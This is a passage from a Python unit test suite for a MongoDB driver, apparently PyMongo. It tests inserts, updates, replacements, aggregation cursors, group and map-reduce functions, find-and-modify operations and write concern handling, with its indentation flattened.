[{"text": text}])
def test_wtimeout(self):
# Ensure setting wtimeout doesn't disable write concern altogether.
# See SERVER-12596.
collection = self.db.test
collection.drop()
collection.insert_one({'_id': 1})
coll = collection.with_options(
write_concern=WriteConcern(w=1, wtimeout=1000))
self.assertRaises(DuplicateKeyError, coll.insert_one, {'_id': 1})
coll = collection.with_options(
write_concern=WriteConcern(wtimeout=1000))
self.assertRaises(DuplicateKeyError, coll.insert_one, {'_id': 1})
def test_error_code(self):
try:
self.db.test.update_many({}, {"$thismodifierdoesntexist": 1})
except OperationFailure as exc:
self.assertTrue(exc.code in (9, 10147, 16840, 17009))
# Just check that we set the error document. Fields
# vary by MongoDB version.
self.assertTrue(exc.details is not None)
else:
self.fail("OperationFailure was not raised")
def test_index_on_subfield(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"hello": {"a": 4, "b": 5}})
db.test.insert_one({"hello": {"a": 7, "b": 2}})
db.test.insert_one({"hello": {"a": 4, "b": 10}})
db.drop_collection("test")
db.test.create_index("hello.a", unique=True)
db.test.insert_one({"hello": {"a": 4, "b": 5}})
db.test.insert_one({"hello": {"a": 7, "b": 2}})
self.assertRaises(DuplicateKeyError,
db.test.insert_one,
{"hello": {"a": 4, "b": 10}})
def test_replace_one(self):
db = self.db
db.drop_collection("test")
self.assertRaises(ValueError,
lambda: db.test.replace_one({}, {"$set": {"x": 1}}))
id1 = db.test.insert_one({"x": 1}).inserted_id
result = db.test.replace_one({"x": 1}, {"y": 1})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"y": 1}))
self.assertEqual(0, db.test.count({"x": 1}))
self.assertEqual(db.test.find_one(id1)["y"], 1)
replacement = RawBSONDocument(bson.BSON.encode({"_id": id1, "z": 1}))
result = db.test.replace_one({"y": 1}, replacement, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"z": 1}))
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(db.test.find_one(id1)["z"], 1)
result = db.test.replace_one({"x": 2}, {"y": 2}, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(0, result.matched_count)
self.assertTrue(result.modified_count in (None, 0))
self.assertTrue(isinstance(result.upserted_id, ObjectId))
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"y": 2}))
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.replace_one({"x": 0}, {"y": 0})
self.assertTrue(isinstance(result, UpdateResult))
self.assertRaises(InvalidOperation, lambda: result.matched_count)
self.assertRaises(InvalidOperation, lambda: result.modified_count)
self.assertRaises(InvalidOperation, lambda: result.upserted_id)
self.assertFalse(result.acknowledged)
def test_update_one(self):
db = self.db
db.drop_collection("test")
self.assertRaises(ValueError,
lambda: db.test.update_one({}, {"x": 1}))
id1 = db.test.insert_one({"x": 5}).inserted_id
result = db.test.update_one({}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(db.test.find_one(id1)["x"], 6)
id2 = db.test.insert_one({"x": 1}).inserted_id
result = db.test.update_one({"x": 6}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(db.test.find_one(id1)["x"], 7)
self.assertEqual(db.test.find_one(id2)["x"], 1)
result = db.test.update_one({"x": 2}, {"$set": {"y": 1}}, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(0, result.matched_count)
self.assertTrue(result.modified_count in (None, 0))
self.assertTrue(isinstance(result.upserted_id, ObjectId))
self.assertTrue(result.acknowledged)
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.update_one({"x": 0}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertRaises(InvalidOperation, lambda: result.matched_count)
self.assertRaises(InvalidOperation, lambda: result.modified_count)
self.assertRaises(InvalidOperation, lambda: result.upserted_id)
self.assertFalse(result.acknowledged)
def test_update_many(self):
db = self.db
db.drop_collection("test")
self.assertRaises(ValueError,
lambda: db.test.update_many({}, {"x": 1}))
db.test.insert_one({"x": 4, "y": 3})
db.test.insert_one({"x": 5, "y": 5})
db.test.insert_one({"x": 4, "y": 4})
result = db.test.update_many({"x": 4}, {"$set": {"y": 5}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(2, result.matched_count)
self.assertTrue(result.modified_count in (None, 2))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(3, db.test.count({"y": 5}))
result = db.test.update_many({"x": 5}, {"$set": {"y": 6}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"y": 6}))
result = db.test.update_many({"x": 2}, {"$set": {"y": 1}}, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(0, result.matched_count)
self.assertTrue(result.modified_count in (None, 0))
self.assertTrue(isinstance(result.upserted_id, ObjectId))
self.assertTrue(result.acknowledged)
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.update_many({"x": 0}, {"$inc": {"x": 1}})
self.assertTrue(isinstance(result, UpdateResult))
self.assertRaises(InvalidOperation, lambda: result.matched_count)
self.assertRaises(InvalidOperation, lambda: result.modified_count)
self.assertRaises(InvalidOperation, lambda: result.upserted_id)
self.assertFalse(result.acknowledged)
def test_update_with_invalid_keys(self):
self.db.drop_collection("test")
self.assertTrue(self.db.test.insert_one({"hello": "world"}))
doc = self.db.test.find_one()
doc['a.b'] = 'c'
expected = InvalidDocument
if client_context.version.at_least(2, 5, 4, -1):
expected = OperationFailure
# Replace
self.assertRaises(expected, self.db.test.replace_one,
{"hello": "world"}, doc)
# Upsert
self.assertRaises(expected, self.db.test.replace_one,
{"foo": "bar"}, doc, upsert=True)
# Check that the last two ops didn't actually modify anything
self.assertTrue('a.b' not in self.db.test.find_one())
# Modify shouldn't check keys...
self.assertTrue(self.db.test.update_one({"hello": "world"},
{"$set": {"foo.bar": "baz"}},
upsert=True))
# I know this seems like testing the server but I'd like to be notified
# by CI if the server's behavior changes here.
doc = SON([("$set", {"foo.bar": "bim"}), ("hello", "world")])
self.assertRaises(OperationFailure, self.db.test.update_one,
{"hello": "world"}, doc, upsert=True)
# This is going to cause keys to be checked and raise InvalidDocument.
# That's OK assuming the server's behavior in the previous assert
# doesn't change. If the behavior changes checking the first key for
# '$' in update won't be good enough anymore.
doc = SON([("hello", "world"), ("$set", {"foo.bar": "bim"})])
self.assertRaises(expected, self.db.test.replace_one,
{"hello": "world"}, doc, upsert=True)
# Replace with empty document
self.assertNotEqual(0,
self.db.test.replace_one(
{"hello": "world"}, {}).matched_count)
def test_acknowledged_delete(self):
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=1000)
db.test.insert_one({"x": 1})
self.assertEqual(1, db.test.count())
# Can't remove from capped collection.
self.assertRaises(OperationFailure, db.test.delete_one, {"x": 1})
db.drop_collection("test")
db.test.insert_one({"x": 1})
db.test.insert_one({"x": 1})
self.assertEqual(2, db.test.delete_many({}).deleted_count)
self.assertEqual(0, db.test.delete_many({}).deleted_count)
def test_manual_last_error(self):
coll = self.db.get_collection("test", write_concern=WriteConcern(w=0))
coll.insert_one({"x": 1})
self.db.command("getlasterror", w=1, wtimeout=1)
def test_count(self):
db = self.db
db.drop_collection("test")
self.assertEqual(db.test.count(), 0)
db.test.insert_many([{}, {}])
self.assertEqual(db.test.count(), 2)
db.test.insert_many([{'foo': 'bar'}, {'foo': 'baz'}])
self.assertEqual(db.test.find({'foo': 'bar'}).count(), 1)
self.assertEqual(db.test.count({'foo': 'bar'}), 1)
self.assertEqual(db.test.find({'foo': re.compile(r'ba.*')}).count(), 2)
self.assertEqual(
db.test.count({'foo': re.compile(r'ba.*')}), 2)
def test_aggregate(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({'foo': [1, 2]})
self.assertRaises(TypeError, db.test.aggregate, "wow")
pipeline = {"$project": {"_id": False, "foo": True}}
result = db.test.aggregate([pipeline], useCursor=False)
self.assertTrue(isinstance(result, CommandCursor))
self.assertEqual([{'foo': [1, 2]}], list(result))
# Test write concern.
if client_context.version.at_least(2, 6):
out_pipeline = [pipeline, {'$out': 'output-collection'}]
with self.write_concern_collection() as coll:
coll.aggregate(out_pipeline)
def test_aggregate_raw_bson(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({'foo': [1, 2]})
self.assertRaises(TypeError, db.test.aggregate, "wow")
pipeline = {"$project": {"_id": False, "foo": True}}
result = db.get_collection(
'test',
codec_options=CodecOptions(document_class=RawBSONDocument)
).aggregate([pipeline], useCursor=False)
self.assertTrue(isinstance(result, CommandCursor))
first_result = next(result)
self.assertIsInstance(first_result, RawBSONDocument)
self.assertEqual([1, 2], list(first_result['foo']))
@client_context.require_version_min(2, 5, 1)
def test_aggregation_cursor_validation(self):
db = self.db
projection = {'$project': {'_id': '$_id'}}
cursor = db.test.aggregate([projection], cursor={})
self.assertTrue(isinstance(cursor, CommandCursor))
cursor = db.test.aggregate([projection], useCursor=True)
self.assertTrue(isinstance(cursor, CommandCursor))
@client_context.require_version_min(2, 5, 1)
def test_aggregation_cursor(self):
db = self.db
if client_context.has_secondaries:
# Test that getMore messages are sent to the right server.
db = self.client.get_database(
db.name,
read_preference=ReadPreference.SECONDARY,
write_concern=WriteConcern(w=self.w))
for collection_size in (10, 1000):
db.drop_collection("test")
db.test.insert_many([{'_id': i} for i in range(collection_size)])
expected_sum = sum(range(collection_size))
# Use batchSize to ensure multiple getMore messages
cursor = db.test.aggregate(
[{'$project': {'_id': '$_id'}}],
batchSize=5)
self.assertEqual(
expected_sum,
sum(doc['_id'] for doc in cursor))
# Test that batchSize is handled properly.
cursor = db.test.aggregate([], batchSize=5)
self.assertEqual(5, len(cursor._CommandCursor__data))
# Force a getMore
cursor._CommandCursor__data.clear()
next(cursor)
# startingFrom for a command cursor doesn't include the initial batch
# returned by the command.
self.assertEqual(5, cursor._CommandCursor__retrieved)
# batchSize - 1
self.assertEqual(4, len(cursor._CommandCursor__data))
# Exhaust the cursor. There shouldn't be any errors.
for doc in cursor:
pass
@client_context.require_version_min(2, 5, 1)
def test_aggregation_cursor_alive(self):
self.db.test.delete_many({})
self.db.test.insert_many([{} for _ in range(3)])
self.addCleanup(self.db.test.delete_many, {})
cursor = self.db.test.aggregate(pipeline=[], cursor={'batchSize': 2})
n = 0
while True:
cursor.next()
n += 1
if 3 == n:
self.assertFalse(cursor.alive)
break
self.assertTrue(cursor.alive)
@client_context.require_version_min(2, 5, 5)
@client_context.require_no_mongos
def test_parallel_scan(self):
db = self.db
db.drop_collection("test")
if client_context.has_secondaries:
# Test that getMore messages are sent to the right server.
db = self.client.get_database(
db.name,
read_preference=ReadPreference.SECONDARY,
write_concern=WriteConcern(w=self.w))
coll = db.test
coll.insert_many([{'_id': i} for i in range(8000)])
docs = []
threads = [threading.Thread(target=docs.extend, args=(cursor,))
for cursor in coll.parallel_scan(3)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(
set(range(8000)),
set(doc['_id'] for doc in docs))
@client_context.require_no_mongos
@client_context.require_version_min(3, 3, 10)
@client_context.require_test_commands
def test_parallel_scan_max_time_ms(self):
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="alwaysOn")
try:
self.assertRaises(ExecutionTimeout,
self.db.test.parallel_scan,
3,
maxTimeMS=1)
finally:
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="off")
def test_group(self):
db = self.db
db.drop_collection("test")
self.assertEqual([],
db.test.group([], {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
db.test.insert_many([{"a": 2}, {"b": 5}, {"a": 1}])
self.assertEqual([{"count": 3}],
db.test.group([], {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
self.assertEqual([{"count": 1}],
db.test.group([], {"a": {"$gt": 1}}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
db.test.insert_one({"a": 2, "b": 3})
self.assertEqual([{"a": 2, "count": 2},
{"a": None, "count": 1},
{"a": 1, "count": 1}],
db.test.group(["a"], {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
# modifying finalize
self.assertEqual([{"a": 2, "count": 3},
{"a": None, "count": 2},
{"a": 1, "count": 2}],
db.test.group(["a"], {}, {"count": 0},
"function (obj, prev) "
"{ prev.count++; }",
"function (obj) { obj.count++; }"))
# returning finalize
self.assertEqual([2, 1, 1],
db.test.group(["a"], {}, {"count": 0},
"function (obj, prev) "
"{ prev.count++; }",
"function (obj) { return obj.count; }"))
# keyf
self.assertEqual([2, 2],
db.test.group("function (obj) { if (obj.a == 2) "
"{ return {a: true} }; "
"return {b: true}; }", {}, {"count": 0},
"function (obj, prev) "
"{ prev.count++; }",
"function (obj) { return obj.count; }"))
# no key
self.assertEqual([{"count": 4}],
db.test.group(None, {}, {"count": 0},
"function (obj, prev) { prev.count++; }"
))
self.assertRaises(OperationFailure, db.test.group,
[], {}, {}, "5 ++ 5")
def test_group_with_scope(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{"a": 1}, {"b": 1}])
reduce_function = "function (obj, prev) { prev.count += inc_value; }"
self.assertEqual(2, db.test.group([], {}, {"count": 0},
Code(reduce_function,
{"inc_value": 1}))[0]['count'])
self.assertEqual(4, db.test.group([], {}, {"count": 0},
Code(reduce_function,
{"inc_value": 2}))[0]['count'])
self.assertEqual(1,
db.test.group([], {}, {"count": 0},
Code(reduce_function,
{"inc_value": 0.5}))[0]['count'])
self.assertEqual(2, db.test.group(
[], {}, {"count": 0},
Code(reduce_function, {"inc_value": 1}))[0]['count'])
self.assertEqual(4, db.test.group(
[], {}, {"count": 0},
Code(reduce_function, {"inc_value": 2}))[0]['count'])
self.assertEqual(1, db.test.group(
[], {}, {"count": 0},
Code(reduce_function, {"inc_value": 0.5}))[0]['count'])
def test_large_limit(self):
db = self.db
db.drop_collection("test_large_limit")
db.test_large_limit.create_index([('x', 1)])
my_str = "mongomongo" * 1000
for i in range(2000):
doc = {"x": i, "y": my_str}
db.test_large_limit.insert_one(doc)
i = 0
y = 0
for doc in db.test_large_limit.find(limit=1900).sort([('x', 1)]):
i += 1
y += doc["x"]
self.assertEqual(1900, i)
self.assertEqual((1900 * 1899) / 2, y)
def test_find_kwargs(self):
db = self.db
db.drop_collection("test")
for i in range(10):
db.test.insert_one({"x": i})
self.assertEqual(10, db.test.count())
total = 0
for x in db.test.find({}, skip=4, limit=2):
total += x["x"]
self.assertEqual(9, total)
def test_rename(self):
db = self.db
db.drop_collection("test")
db.drop_collection("foo")
self.assertRaises(TypeError, db.test.rename, 5)
self.assertRaises(InvalidName, db.test.rename, "")
self.assertRaises(InvalidName, db.test.rename, "te$t")
self.assertRaises(InvalidName, db.test.rename, ".test")
self.assertRaises(InvalidName, db.test.rename, "test.")
self.assertRaises(InvalidName, db.test.rename, "tes..t")
self.assertEqual(0, db.test.count())
self.assertEqual(0, db.foo.count())
for i in range(10):
db.test.insert_one({"x": i})
self.assertEqual(10, db.test.count())
db.test.rename("foo")
self.assertEqual(0, db.test.count())
self.assertEqual(10, db.foo.count())
x = 0
for doc in db.foo.find():
self.assertEqual(x, doc["x"])
x += 1
db.test.insert_one({})
self.assertRaises(OperationFailure, db.foo.rename, "test")
db.foo.rename("test", dropTarget=True)
with self.write_concern_collection() as coll:
coll.rename('foo')
def test_find_one(self):
db = self.db
db.drop_collection("test")
_id = db.test.insert_one({"hello": "world", "foo": "bar"}).inserted_id
self.assertEqual("world", db.test.find_one()["hello"])
self.assertEqual(db.test.find_one(_id), db.test.find_one())
self.assertEqual(db.test.find_one(None), db.test.find_one())
self.assertEqual(db.test.find_one({}), db.test.find_one())
self.assertEqual(db.test.find_one({"hello": "world"}),
db.test.find_one())
self.assertTrue("hello" in db.test.find_one(projection=["hello"]))
self.assertTrue("hello" not in db.test.find_one(projection=["foo"]))
self.assertEqual(["_id"], list(db.test.find_one(projection=[])))
self.assertEqual(None, db.test.find_one({"hello": "foo"}))
self.assertEqual(None, db.test.find_one(ObjectId()))
def test_find_one_non_objectid(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"_id": 5})
self.assertTrue(db.test.find_one(5))
self.assertFalse(db.test.find_one(6))
def test_find_one_with_find_args(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{"x": i} for i in range(1, 4)])
self.assertEqual(1, db.test.find_one()["x"])
self.assertEqual(2, db.test.find_one(skip=1, limit=2)["x"])
def test_find_with_sort(self):
db = self.db
db.drop_collection("test")
db.test.insert_many([{"x": 2}, {"x": 1}, {"x": 3}])
self.assertEqual(2, db.test.find_one()["x"])
self.assertEqual(1, db.test.find_one(sort=[("x", 1)])["x"])
self.assertEqual(3, db.test.find_one(sort=[("x", -1)])["x"])
def to_list(things):
return [thing["x"] for thing in things]
self.assertEqual([2, 1, 3], to_list(db.test.find()))
self.assertEqual([1, 2, 3], to_list(db.test.find(sort=[("x", 1)])))
self.assertEqual([3, 2, 1], to_list(db.test.find(sort=[("x", -1)])))
self.assertRaises(TypeError, db.test.find, sort=5)
self.assertRaises(TypeError, db.test.find, sort="hello")
self.assertRaises(ValueError, db.test.find, sort=["hello", 1])
# TODO doesn't actually test functionality, just that it doesn't blow up
def test_cursor_timeout(self):
list(self.db.test.find(no_cursor_timeout=True))
list(self.db.test.find(no_cursor_timeout=False))
def test_exhaust(self):
if is_mongos(self.db.client):
self.assertRaises(InvalidOperation,
self.db.test.find,
cursor_type=CursorType.EXHAUST)
return
# Limit is incompatible with exhaust.
self.assertRaises(InvalidOperation,
self.db.test.find,
cursor_type=CursorType.EXHAUST,
limit=5)
cur = self.db.test.find(cursor_type=CursorType.EXHAUST)
self.assertRaises(InvalidOperation, cur.limit, 5)
cur = self.db.test.find(limit=5)
self.assertRaises(InvalidOperation, cur.add_option, 64)
cur = self.db.test.find()
cur.add_option(64)
self.assertRaises(InvalidOperation, cur.limit, 5)
self.db.drop_collection("test")
# Insert enough documents to require more than one batch
self.db.test.insert_many([{'i': i} for i in range(150)])
client = rs_or_single_client(maxPoolSize=1)
socks = get_pool(client).sockets
# Make sure the socket is returned after exhaustion.
cur = client[self.db.name].test.find(cursor_type=CursorType.EXHAUST)
next(cur)
self.assertEqual(0, len(socks))
for _ in cur:
pass
self.assertEqual(1, len(socks))
# Same as previous but don't call next()
for _ in client[self.db.name].test.find(cursor_type=CursorType.EXHAUST):
pass
self.assertEqual(1, len(socks))
# If the Cursor instance is discarded before being
# completely iterated we have to close and
# discard the socket.
cur = client[self.db.name].test.find(cursor_type=CursorType.EXHAUST)
next(cur)
self.assertEqual(0, len(socks))
if sys.platform.startswith('java') or 'PyPy' in sys.version:
# Don't wait for GC or use gc.collect(), it's unreliable.
cur.close()
cur = None
# The socket should be discarded.
self.assertEqual(0, len(socks))
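        # In short: an exhaust cursor pins its socket until it is fully
        # iterated; a cursor discarded mid-iteration has its socket closed
        # and dropped from the pool rather than reused.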
def test_distinct(self):
self.db.drop_collection("test")
test = self.db.test
test.insert_many([{"a": 1}, {"a": 2}, {"a": 2}, {"a": 2}, {"a": 3}])
distinct = test.distinct("a")
distinct.sort()
self.assertEqual([1, 2, 3], distinct)
distinct = test.find({'a': {'$gt': 1}}).distinct("a")
distinct.sort()
self.assertEqual([2, 3], distinct)
distinct = test.distinct('a', {'a': {'$gt': 1}})
distinct.sort()
self.assertEqual([2, 3], distinct)
self.db.drop_collection("test")
test.insert_one({"a": {"b": "a"}, "c": 12})
test.insert_one({"a": {"b": "b"}, "c": 12})
test.insert_one({"a": {"b": "c"}, "c": 12})
test.insert_one({"a": {"b": "c"}, "c": 12})
distinct = test.distinct("a.b")
distinct.sort()
self.assertEqual(["a", "b", "c"], distinct)
def test_query_on_query_field(self):
self.db.drop_collection("test")
self.db.test.insert_one({"query": "foo"})
self.db.test.insert_one({"bar": "foo"})
self.assertEqual(1,
self.db.test.find({"query": {"$ne": None}}).count())
self.assertEqual(1,
len(list(self.db.test.find({"query": {"$ne": None}})))
)
def test_min_query(self):
self.db.drop_collection("test")
self.db.test.insert_many([{"x": 1}, {"x": 2}])
self.db.test.create_index("x")
self.assertEqual(1, len(list(self.db.test.find({"$min": {"x": 2},
"$query": {}}))))
self.assertEqual(2, self.db.test.find({"$min": {"x": 2},
"$query": {}})[0]["x"])
def test_numerous_inserts(self):
# Ensure we don't exceed server's 1000-document batch size limit.
self.db.test.drop()
n_docs = 2100
self.db.test.insert_many([{} for _ in range(n_docs)])
self.assertEqual(n_docs, self.db.test.count())
self.db.test.drop()
def test_map_reduce(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"id": 1, "tags": ["dog", "cat"]})
db.test.insert_one({"id": 2, "tags": ["cat"]})
db.test.insert_one({"id": 3, "tags": ["mouse", "cat", "dog"]})
db.test.insert_one({"id": 4, "tags": []})
map = Code("function () {"
" this.tags.forEach(function(z) {"
" emit(z, 1);"
" });"
"}")
reduce = Code("function (key, values) {"
" var total = 0;"
" for (var i = 0; i < values.length; i++) {"
" total += values[i];"
" }"
" return total;"
"}")
result = db.test.map_reduce(map, reduce, out='mrunittests')
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(2, result.find_one({"_id": "dog"})["value"])
self.assertEqual(1, result.find_one({"_id": "mouse"})["value"])
db.test.insert_one({"id": 5, "tags": ["hampster"]})
result = db.test.map_reduce(map, reduce, out='mrunittests')
self.assertEqual(1, result.find_one({"_id": "hampster"})["value"])
db.test.delete_one({"id": 5})
result = db.test.map_reduce(map, reduce,
out={'merge': 'mrunittests'})
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(1, result.find_one({"_id": "hampster"})["value"])
result = db.test.map_reduce(map, reduce,
out={'reduce': 'mrunittests'})
self.assertEqual(6, result.find_one({"_id": "cat"})["value"])
self.assertEqual(4, result.find_one({"_id": "dog"})["value"])
self.assertEqual(2, result.find_one({"_id": "mouse"})["value"])
self.assertEqual(1, result.find_one({"_id": "hampster"})["value"])
result = db.test.map_reduce(
map,
reduce,
out={'replace': 'mrunittests'}
)
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(2, result.find_one({"_id": "dog"})["value"])
self.assertEqual(1, result.find_one({"_id": "mouse"})["value"])
result = db.test.map_reduce(map, reduce,
out=SON([('replace', 'mrunittests'),
('db', 'mrtestdb')
]))
self.assertEqual(3, result.find_one({"_id": "cat"})["value"])
self.assertEqual(2, result.find_one({"_id": "dog"})["value"])
self.assertEqual(1, result.find_one({"_id": "mouse"})["value"])
self.client.drop_database('mrtestdb')
full_result = db.test.map_reduce(map, reduce,
out='mrunittests', full_response=True)
self.assertEqual(6, full_result["counts"]["emit"])
result = db.test.map_reduce(map, reduce, out='mrunittests', limit=2)
self.assertEqual(2, result.find_one({"_id": "cat"})["value"])
self.assertEqual(1, result.find_one({"_id": "dog"})["value"])
self.assertEqual(None, result.find_one({"_id": "mouse"}))
result = db.test.map_reduce(map, reduce, out={'inline': 1})
self.assertTrue(isinstance(result, dict))
self.assertTrue('results' in result)
self.assertTrue(result['results'][1]["_id"] in ("cat",
"dog",
"mouse"))
result = db.test.inline_map_reduce(map, reduce)
self.assertTrue(isinstance(result, list))
self.assertEqual(3, len(result))
self.assertTrue(result[1]["_id"] in ("cat", "dog", "mouse"))
full_result = db.test.inline_map_reduce(map, reduce,
full_response=True)
self.assertEqual(6, full_result["counts"]["emit"])
with self.write_concern_collection() as coll:
coll.map_reduce(map, reduce, 'output')
def test_messages_with_unicode_collection_names(self):
db = self.db
db[u"Employés"].insert_one({"x": 1})
db[u"Employés"].replace_one({"x": 1}, {"x": 2})
db[u"Employés"].delete_many({})
db[u"Employés"].find_one()
list(db[u"Employés"].find())
def test_drop_indexes_non_existent(self):
self.db.drop_collection("test")
self.db.test.drop_indexes()
# This is really a bson test but easier to just reproduce it here...
# (Shame on me)
def test_bad_encode(self):
c = self.db.test
c.drop()
self.assertRaises(InvalidDocument, c.insert_one, {"x": c})
class BadGetAttr(dict):
def __getattr__(self, name):
pass
bad = BadGetAttr([('foo', 'bar')])
c.insert_one({'bad': bad})
self.assertEqual('bar', c.find_one()['bad']['foo'])
def test_find_one_and(self):
c = self.db.test
c.drop()
c.insert_one({'_id': 1, 'i': 1})
self.assertEqual({'_id': 1, 'i': 1},
c.find_one_and_update({'_id': 1}, {'$inc': {'i': 1}}))
self.assertEqual({'_id': 1, 'i': 3},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
return_document=ReturnDocument.AFTER))
self.assertEqual({'_id': 1, 'i': 3},
c.find_one_and_delete({'_id': 1}))
self.assertEqual(None, c.find_one({'_id': 1}))
self.assertEqual(None,
c.find_one_and_update({'_id': 1}, {'$inc': {'i': 1}}))
self.assertEqual({'_id': 1, 'i': 1},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
return_document=ReturnDocument.AFTER,
upsert=True))
self.assertEqual({'_id': 1, 'i': 2},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
return_document=ReturnDocument.AFTER))
self.assertEqual({'_id': 1, 'i': 3},
c.find_one_and_replace(
{'_id': 1}, {'i': 3, 'j': 1},
projection=['i'],
return_document=ReturnDocument.AFTER))
self.assertEqual({'i': 4},
c.find_one_and_update(
{'_id': 1}, {'$inc': {'i': 1}},
projection={'i': 1, '_id': 0},
return_document=ReturnDocument.AFTER))
c.drop()
for j in range(5):
c.insert_one({'j': j, 'i': 0})
sort = [('j', DESCENDING)]
self.assertEqual(4, c.find_one_and_update({},
{'$inc': {'i': 1}},
sort=sort)['j'])
def test_find_one_and_write_concern(self):
listener = EventListener()
saved_listeners = monitoring._LISTENERS
monitoring._LISTENERS = monitoring._Listeners([], [], [], [])
db = single_client(event_listeners=[listener])[self.db.name]
# non-default WriteConcern.
c_w0 = db.get_collection(
'test', write_concern=WriteConcern(w=0))
# default WriteConcern.
c_default = db.get_collection('test', write_concern=WriteConcern())
results = listener.results
# Authenticate the client and throw out auth commands from the listener.
db.command('ismaster')
results.clear()
try:
if client_context.version.at_least(3, 1, 9, -1):
c_w0.find_and_modify(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
c_w0.find_one_and_update(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
c_w0.find_one_and_replace({'_id': 1}, {'foo': 'bar'})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
c_w0.find_one_and_delete({'_id': 1})
self.assertEqual(
{'w': 0}, results['started'][0].command['writeConcern'])
results.clear()
# Test write concern errors.
if client_context.is_rs:
c_wc_error = db.get_collection(
'test',
write_concern=WriteConcern(
w=len(client_context.nodes) + 1))
self.assertRaises(
WriteConcernError,
c_wc_error.find_and_modify,
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertRaises(
WriteConcernError,
c_wc_error.find_one_and_update,
{'_id': 1}, {'$set': {'foo': 'bar'}})
                    self.assertRaises(
                        WriteConcernError,
                        c_wc_error.find_one_and_replace,
                        {'_id': 1}, {'foo': 'bar'})
                    self.assertRaises(
                        WriteConcernError,
                        c_wc_error.find_one_and_delete,
                        {'_id': 1})
results.clear()
else:
c_w0.find_and_modify(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_w0.find_one_and_update(
{'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_w0.find_one_and_replace({'_id': 1}, {'foo': 'bar'})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_w0.find_one_and_delete({'_id': 1})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_and_modify({'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_one_and_update({'_id': 1}, {'$set': {'foo': 'bar'}})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_one_and_replace({'_id': 1}, {'foo': 'bar'})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
c_default.find_one_and_delete({'_id': 1})
self.assertNotIn('writeConcern', results['started'][0].command)
results.clear()
finally:
monitoring._LISTENERS = saved_listeners
def test_find_with_nested(self):
c = self.db.test
c.drop()
c.insert_many([{'i': i} for i in range(5)]) # [0, 1, 2, 3, 4]
self.assertEqual(
[2],
[i['i'] for i in c.find({
'$and': [
{
# This clause gives us [1,2,4]
'$or': [
{'i': {'$lte': 2}},
{'i': {'$gt': 3}},
],
},
{
# This clause gives us [2,3]
'$or': [
{'i': 2},
{'i': 3},
]
},
]
})]
)
self.assertEqual(
[0, 1, 2],
[i['i'] for i in c.find({
'$or': [
{
# This clause gives us [2]
'$and': [
{'i': {'$gte': 2}},
{'i': {'$lt': 3}},
],
},
{
# This clause gives us [0,1]
